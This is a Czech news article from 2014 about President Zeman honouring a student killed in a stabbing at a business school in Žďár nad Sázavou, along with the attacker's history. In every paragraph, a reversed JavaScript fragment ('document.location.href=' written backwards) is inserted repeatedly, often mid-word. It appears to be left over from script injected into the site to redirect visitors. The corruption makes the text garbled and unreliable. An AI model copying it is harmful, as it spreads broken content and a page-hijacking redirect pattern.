prezident, uctění památky, student
Rainbow page separator

Prezident uctí památku zavražděného studenta

Středa, 15. října 2014

Uctění památky studenta, Obchodní škola Žďár nad Sázavou

Žďár nad Sázavou / V pátek před jedenác[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou hodinou zapálí ve Žďáře svíčku a položí květiny k uctění památky studenta zavražděného ve střední obchodní škole prezident České republiky Miloš Zeman. Před vchodem do školy bylo po tragédii vytvořeno pietní mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, kam lidé pokládají květiny a zapálené svíčky, na budově je vyvěšen černý prapor.
Prezident Zeman rovněž nevyloučil, že v příštím roce chlapce, který chránil svoji spolužačku, a zasahujícího policejního vyjednavače, jenž byl při zásahu ú[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];točnicí zraněn, vyznamená. Pro le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní rok je již udělování státních vyznamenání uzavřené.
Kromě šestnáctiletého studenta, kterého smrtelně zranila šestadvacetiletá schizofrenička z Ostravska, byly při ú[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toku ve škole poraněny dvě další studentky a zranění utrpěl i policista. Agresorka, která si podle vyjádření policie žďárskou školu a oběti vybrala náhodně, se podobného činu dopustila už před dvěma lety v Havířově. Tam se v základní škole pokusila unést sedmile[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou holčičku a při [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom vážně pobodala vychovatelku, která dívenku chránila. Trestní stíhání ale bylo tehdy pro duševní poruchu pachatelky zastaveno a žena trpící schizofrenií skončila v ústavní léčbě. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos v únoru však byla na žádost psychiatrické léčebny v Opavě a po schválení opavským soudem propuštěna do ambulantní péče.

Žena pobodala studenty ve škole, šestnáctiletý chlapec zemřel